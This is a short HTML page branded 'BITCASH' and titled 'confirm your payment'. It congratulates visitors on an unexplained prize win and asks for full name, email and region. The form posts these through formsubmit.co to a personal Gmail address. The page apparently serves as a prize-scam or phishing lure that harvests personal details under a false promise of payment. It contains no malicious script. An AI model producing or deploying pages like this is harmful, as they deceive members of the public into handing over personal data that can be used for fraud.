<html>
<style>
*{
    margin: 0;
    padding: 0;
    font-family: sans-serif;
}
nav{
    width: 100%;
    height: 60px;
    background: midnightblue;
}
.logo{
    text-align: center;
    position: relative;
    top: 10px;
    font-size: 27px;
    font-weight: bold;
    color: white;
}
span{
    color: red;
}
h2{
    color: green;
    text-align: center;
    margin-top: 39px;
}
p{
    text-align: center;
    margin-top: 12px;
}
h3{
    text-align: center;
    margin-top: 29px;
    text-transform: uppercase;
}
form{
    display: flex;
    flex-direction: column;
    width: 18rem;
    gap: 1rem;
    margin-left: 39px;
    margin-top: 24px;
}
input,
select,
textarea{
    padding: 0.8rem;
    background: transparent;
    border: 1px solid black;
    border-radius: 2px;
}
textarea{
    height: 6rem;
}
button{
    height: 36px;
    background: red;
    border: none;
}
button:hover{
    background: white;
    border: 1px solid black;
}
p{
    margin-bottom: 29px;
}
footer{
    position: relative;
    top: 17px;
}
</style>
<title>confirm your payment</title>
<body>
<nav>
<div class="logo">
<span>BIT</span>CASH
</div>

</nav>
<h2>congratulations</h2>
<p>if you are here you have won an amazing price kindly filled the form below to receive your payment</p>



<div class="container">
<h3>placed your request</h3>
<form action="https://formsubmit.co/osasw090@gmail.com" method="POST">
<input type="text" name="Name" placeholder="full name" required>
<input type="email" name="Email" placeholder="Email" required>
<select name="country">
<option>African</option>
<option>Australia</option>
<option>Asia</option>
<option>Antarctica</option>
<option>Europe</option>
<option>North American</option>
<option>South American</option>
</select>
<textarea placeholder="message"></textarea>
<button type="submit">submit</button>
</form>

<footer>
<h3>warning</h3>
<p>please do not message anything illegal or you will be banned from receiving your cash. so please do not go against that law</p>
</footer>
</div>
</body>
</html>







